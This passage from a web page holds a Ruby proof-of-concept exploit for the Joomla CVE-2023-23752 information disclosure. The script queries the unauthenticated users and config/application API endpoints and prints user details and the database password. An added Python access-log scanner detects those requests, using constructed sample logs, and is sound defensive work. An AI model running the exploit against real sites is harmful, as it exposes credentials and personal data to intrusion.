:bold]}<br /><br />  #{Paint['Usage:', :red]}<br />    #{__FILE__} <url> [options]<br />    #{__FILE__} -h | --help<br /><br />  #{Paint['Parameters:', :red]}<br />    <url>  Root URL (base path) including HTTP scheme, port and root folder<br /><br />  #{Paint['Options:', :red]}<br />    --debug     Display arguments<br />    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)<br />    -h, --help  Show this screen<br /><br />  #{Paint['Examples:', :red]}<br />    #{__FILE__} http://127.0.0.1:4242<br />    #{__FILE__} https://example.org/subdir<br /><br />  #{Paint['Project:', :red]}<br />    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)<br />    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)<br />    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)<br />DOCOPT<br /><br /># The users endpoint answers unauthenticated requests when public=true is set<br />def fetch_users(root_url, http)<br />  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"<br />  http.get(vuln_url)<br />end<br /><br />def parse_users(root_url, http)<br />  data_json = fetch_users(root_url, http)<br />  data = JSON.parse(data_json)['data']<br />  users = []<br />  data.each do |user|<br />    if user['type'] == 'users'<br />      id = user['attributes']['id']<br />      name = user['attributes']['name']<br />      username = user['attributes']['username']<br />      email = user['attributes']['email']<br />      groups = user['attributes']['group_names']<br />      users << {id: id, name: name, username: username, email: email, groups: groups}<br />    end<br />  end<br />  users<br />end<br /><br />def display_users(root_url, http)<br />  users = parse_users(root_url, http)<br />  puts Paint['Users', :red, :bold]<br />  users.each do |u|<br />    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"<br />  end<br />end<br /><br /># The application config endpoint leaks configuration.php, database credentials included<br />def fetch_config(root_url, http)<br />  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"<br />  http.get(vuln_url)<br />end<br /><br />def parse_config(root_url, http)<br />  data_json = fetch_config(root_url, http)<br />  data = JSON.parse(data_json)['data']<br />  config = {}<br />  data.each do |entry|<br />    if entry['type'] == 'application'<br />      key = entry['attributes'].keys.first<br />      config[key] = entry['attributes'][key]<br />    end<br />  end<br />  config<br />end<br /><br />def display_config(root_url, http)<br />  c = parse_config(root_url, http)<br />  puts Paint['Site info', :red, :bold]<br />  puts "Site name: #{c['sitename']}"<br />  puts "Editor: #{c['editor']}"<br />  puts "Captcha: #{c['captcha']}"<br />  puts "Access: #{c['access']}"<br />  puts "Debug status: #{c['debug']}"<br />  puts<br />  puts Paint['Database info', :red, :bold]<br />  puts "DB type: #{c['dbtype']}"<br />  puts "DB host: #{c['host']}"<br />  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"<br />  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"<br />  puts "DB name: #{c['db']}"<br />  puts "DB prefix: #{c['dbprefix']}"<br />  puts "DB encryption #{c['dbencryption']}"<br />end<br /><br />begin<br />  args = Docopt.docopt(doc)<br />  Paint.mode = 0 if args['--no-color']<br />  puts args if args['--debug']<br /><br />  http = HTTPX<br />  display_users(args['<url>'], http)<br />  puts<br />  display_config(args['<url>'], http)<br />rescue Docopt::Exit => e<br />  puts e.message<br />end<br /></code></pre>
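Because the disclosure above is a pair of unauthenticated GET requests, it leaves a distinctive trace in the web server access log: a request to /api/index.php/v1/config/application or /api/index.php/v1/users with public=true in the query string, answered with 200 and a JSON body. The following is an added example, not part of the exploit or of Joomla: it parses combined-format (Apache/nginx) access log lines and flags those requests, separating attempts from the ones the server actually answered. The log lines embedded in it are constructed; the IP addresses, timestamps, sizes and user agents are made up, and the site_prefix parameter for sub-directory installs is my own addition.

```python
"""Access-log triage for CVE-2023-23752 (Joomla! 4.0.0 up to 4.2.7).

Added example, not part of the exploit above. It flags the two unauthenticated
API requests the exploit makes. The log lines at the bottom are constructed:
the IP addresses, timestamps, sizes and user agents are made up.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Endpoints queried by the exploit; both answer unauthenticated requests when public=true is set
SENSITIVE_ENDPOINTS = {
    "/api/index.php/v1/config/application": "site config incl. DB credentials",
    "/api/index.php/v1/users": "user list",
}

# Combined log format: client - user [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


@dataclass
class Hit:
    ip: str
    time: str
    path: str
    what: str
    status: int


def classify(line: str, site_prefix: str = "") -> Optional[Hit]:
    """Return a Hit if the line is a public=true GET to one of the leaking endpoints.
    site_prefix handles Joomla installed in a sub-directory (e.g. "/subdir")."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path
    if site_prefix and path.startswith(site_prefix):
        path = path[len(site_prefix):]
    if path not in SENSITIVE_ENDPOINTS or m["method"] != "GET":
        return None
    public = parse_qs(parts.query).get("public", [""])[0].lower()
    if public != "true":
        return None
    return Hit(m["ip"], m["time"], path, SENSITIVE_ENDPOINTS[path], int(m["status"]))


def scan(lines: Iterable[str], site_prefix: str = "") -> List[Hit]:
    """All exploitation attempts, successful or not (a 401/403 still shows someone probing)."""
    return [h for h in (classify(line, site_prefix) for line in lines) if h]


def confirmed_leaks(hits: Iterable[Hit]) -> List[Hit]:
    """Attempts the server answered with 200: on an unpatched site the body held the data."""
    return [h for h in hits if h.status == 200]


# Constructed sample log (made-up addresses, times, sizes and user agents)
SAMPLE_LOG = """\
203.0.113.7 - - [24/Mar/2023:10:14:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 1843 "-" "curl/7.88.1"
203.0.113.7 - - [24/Mar/2023:10:14:03 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2210 "-" "curl/7.88.1"
198.51.100.9 - - [24/Mar/2023:10:20:11 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 122 "-" "python-requests/2.28.2"
192.0.2.4 - - [24/Mar/2023:10:21:40 +0000] "GET /index.php/component/users/?view=login HTTP/1.1" 200 9340 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Mar/2023:10:22:05 +0000] "GET /subdir/api/index.php/v1/users?public=true HTTP/1.1" 200 1843 "-" "python-requests/2.28.2"
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, site_prefix="/subdir"):
        flag = "LEAKED" if hit.status == 200 else "blocked"
        print(f"{hit.time} {hit.ip} {hit.path} ({hit.what}) -> {hit.status} {flag}")
```

A 200 on the config/application endpoint means the database password in configuration.php should be treated as compromised and rotated, independent of whether the upgrade to 4.2.8 has since been applied; the 403 line shows what the same probe looks like against a host that refuses the request.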